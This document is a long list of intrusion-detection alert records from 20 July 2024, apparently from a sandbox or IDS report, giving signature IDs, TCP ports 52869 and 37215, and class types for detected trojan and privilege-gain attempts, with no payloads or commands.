                      Timestamp:07/20/24-23:01:42.693536
                      SID:2027339
                      Source Port:33042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.870961
                      SID:2027339
                      Source Port:34216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.370395
                      SID:2027339
                      Source Port:33046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.186337
                      SID:2027339
                      Source Port:56660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2829579
                      Source Port:54958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.358680
                      SID:2027339
                      Source Port:40212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.608153
                      SID:2025132
                      Source Port:40144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2835222
                      Source Port:34462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.045831
                      SID:2829579
                      Source Port:45764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.719940
                      SID:2831300
                      Source Port:50692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.922746
                      SID:2027339
                      Source Port:36258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2829579
                      Source Port:56250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.971718
                      SID:2027339
                      Source Port:44830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.287639
                      SID:2025132
                      Source Port:38582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.985200
                      SID:2025132
                      Source Port:45994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.322055
                      SID:2027339
                      Source Port:42282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.639622
                      SID:2027339
                      Source Port:50874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.660067
                      SID:2835222
                      Source Port:52356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.614619
                      SID:2027339
                      Source Port:59020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.167711
                      SID:2027339
                      Source Port:39028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634165
                      SID:2835222
                      Source Port:34358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2829579
                      Source Port:42308
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.444461
                      SID:2027339
                      Source Port:47526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.639622
                      SID:2027339
                      Source Port:35924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.901420
                      SID:2027339
                      Source Port:44428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.479337
                      SID:2831300
                      Source Port:45740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.161892
                      SID:2829579
                      Source Port:35634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641803
                      SID:2835222
                      Source Port:47982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.623583
                      SID:2027339
                      Source Port:35502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.192511
                      SID:2027339
                      Source Port:58484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.224525
                      SID:2027339
                      Source Port:51680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.787983
                      SID:2831300
                      Source Port:47580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.353592
                      SID:2025132
                      Source Port:39768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2835222
                      Source Port:56038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.213578
                      SID:2027339
                      Source Port:41160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.852700
                      SID:2025132
                      Source Port:50044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.240033
                      SID:2829579
                      Source Port:58496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2835222
                      Source Port:36250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.630572
                      SID:2829579
                      Source Port:53720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.691384
                      SID:2027339
                      Source Port:51458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.266026
                      SID:2831300
                      Source Port:50320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.659105
                      SID:2831300
                      Source Port:43892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.231608
                      SID:2831300
                      Source Port:45954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.586276
                      SID:2831300
                      Source Port:32882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.575986
                      SID:2831300
                      Source Port:57642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.261026
                      SID:2025132
                      Source Port:38576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.797133
                      SID:2027339
                      Source Port:55262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.923127
                      SID:2025132
                      Source Port:46216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:15.054105
                      SID:2027339
                      Source Port:56492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2829579
                      Source Port:54882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2835222
                      Source Port:53838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:17.231770
                      SID:2831300
                      Source Port:47788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.115778
                      SID:2027339
                      Source Port:59720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.589820
                      SID:2027339
                      Source Port:55584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.677933
                      SID:2831300
                      Source Port:37062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.633385
                      SID:2835222
                      Source Port:55384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2835222
                      Source Port:42602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.743796
                      SID:2831300
                      Source Port:46648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2835222
                      Source Port:42854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2829579
                      Source Port:58456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.669446
                      SID:2025132
                      Source Port:47742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2835222
                      Source Port:38990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.495508
                      SID:2027339
                      Source Port:44590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2835222
                      Source Port:52540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.176893
                      SID:2027339
                      Source Port:36354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.748522
                      SID:2027339
                      Source Port:47778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043865
                      SID:2835222
                      Source Port:48550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.359782
                      SID:2027339
                      Source Port:57764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.827498
                      SID:2829579
                      Source Port:52512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.620386
                      SID:2831300
                      Source Port:50282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.439543
                      SID:2027339
                      Source Port:44954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.766611
                      SID:2027339
                      Source Port:51032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.210939
                      SID:2831300
                      Source Port:47266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.144379
                      SID:2027339
                      Source Port:58952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.343266
                      SID:2027339
                      Source Port:54936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.833558
                      SID:2027339
                      Source Port:34832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.357047
                      SID:2027339
                      Source Port:49068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.491660
                      SID:2025132
                      Source Port:39696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.964831
                      SID:2027339
                      Source Port:35084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.893677
                      SID:2027339
                      Source Port:34106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2835222
                      Source Port:54904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982478
                      SID:2835222
                      Source Port:46772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.208327
                      SID:2027339
                      Source Port:50512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2829579
                      Source Port:46510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222254
                      SID:2829579
                      Source Port:34142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2835222
                      Source Port:46162
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.198416
                      SID:2831300
                      Source Port:33032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2829579
                      Source Port:42978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.180913
                      SID:2027339
                      Source Port:53382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.220119
                      SID:2831300
                      Source Port:35088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:07.236630
                      SID:2025132
                      Source Port:37638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.510714
                      SID:2027339
                      Source Port:40700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.517399
                      SID:2025132
                      Source Port:50900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.919725
                      SID:2831300
                      Source Port:46758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.688478
                      SID:2027339
                      Source Port:60970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.946258
                      SID:2027339
                      Source Port:42936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.085627
                      SID:2027339
                      Source Port:52618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.556921
                      SID:2831300
                      Source Port:56592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:26.420170
                      SID:2025132
                      Source Port:44598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.821906
                      SID:2027339
                      Source Port:51208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.249014
                      SID:2025132
                      Source Port:58350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:06.453402
                      SID:2025132
                      Source Port:34724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.206219
                      SID:2025132
                      Source Port:54166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.014458
                      SID:2829579
                      Source Port:59218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.411586
                      SID:2027339
                      Source Port:35022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.378725
                      SID:2027339
                      Source Port:50554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2835222
                      Source Port:33182
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:48.447183
                      SID:2025132
                      Source Port:45040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.849112
                      SID:2829579
                      Source Port:32780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.671155
                      SID:2027339
                      Source Port:43120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.058685
                      SID:2025132
                      Source Port:44428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.231608
                      SID:2027339
                      Source Port:42252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.979156
                      SID:2831300
                      Source Port:37118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:02.570955
                      SID:2027339
                      Source Port:60414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2835222
                      Source Port:38606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.279669
                      SID:2829579
                      Source Port:60064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.148866
                      SID:2027339
                      Source Port:33468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.007334
                      SID:2027339
                      Source Port:39442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:03.085082
                      SID:2831300
                      Source Port:48622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.758824
                      SID:2025132
                      Source Port:45004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.880225
                      SID:2831300
                      Source Port:48754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.631492
                      SID:2831300
                      Source Port:44358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2829579
                      Source Port:59334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2829579
                      Source Port:56630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2829579
                      Source Port:40562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.379759
                      SID:2025132
                      Source Port:51148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.287248
                      SID:2025132
                      Source Port:58220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.566124
                      SID:2831300
                      Source Port:41876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.350602
                      SID:2831300
                      Source Port:36276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.985320
                      SID:2025132
                      Source Port:52730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.949637
                      SID:2027339
                      Source Port:55394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.243014
                      SID:2831300
                      Source Port:60560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.328066
                      SID:2027339
                      Source Port:56348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.034562
                      SID:2835222
                      Source Port:33016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132510
                      SID:2829579
                      Source Port:47976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.439689
                      SID:2831300
                      Source Port:55516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.051104
                      SID:2829579
                      Source Port:58588
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2829579
                      Source Port:55640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.266946
                      SID:2025132
                      Source Port:49308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2829579
                      Source Port:35438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2835222
                      Source Port:44032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.584507
                      SID:2831300
                      Source Port:41676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.318262
                      SID:2027339
                      Source Port:57020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.099838
                      SID:2027339
                      Source Port:41820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.986585
                      SID:2027339
                      Source Port:49714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2835222
                      Source Port:42054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.537829
                      SID:2831300
                      Source Port:54900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.419124
                      SID:2025132
                      Source Port:35788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.922661
                      SID:2831300
                      Source Port:46738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:28.464626
                      SID:2831300
                      Source Port:52100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.900987
                      SID:2025132
                      Source Port:46180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2829579
                      Source Port:43764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2835222
                      Source Port:49920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.190671
                      SID:2027339
                      Source Port:54998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.355606
                      SID:2025132
                      Source Port:46546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.079114
                      SID:2835222
                      Source Port:35484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.692209
                      SID:2831300
                      Source Port:40688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.423882
                      SID:2831300
                      Source Port:37532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2835222
                      Source Port:49024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2835222
                      Source Port:52904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.028316
                      SID:2025132
                      Source Port:34818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2835222
                      Source Port:53044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.961552
                      SID:2027339
                      Source Port:42842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.244347
                      SID:2027339
                      Source Port:34198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2829579
                      Source Port:50952
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.365783
                      SID:2831300
                      Source Port:36496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.990535
                      SID:2829579
                      Source Port:52666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.373922
                      SID:2831300
                      Source Port:52258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.890268
                      SID:2027339
                      Source Port:48568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.094539
                      SID:2027339
                      Source Port:38588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.520303
                      SID:2025132
                      Source Port:33856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.380560
                      SID:2025132
                      Source Port:34342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2829579
                      Source Port:52948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.425638
                      SID:2027339
                      Source Port:36282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2829579
                      Source Port:41970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.113390
                      SID:2829579
                      Source Port:59466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.596563
                      SID:2027339
                      Source Port:33634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.977046
                      SID:2027339
                      Source Port:50968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.148145
                      SID:2835222
                      Source Port:36240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.820768
                      SID:2027339
                      Source Port:45600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
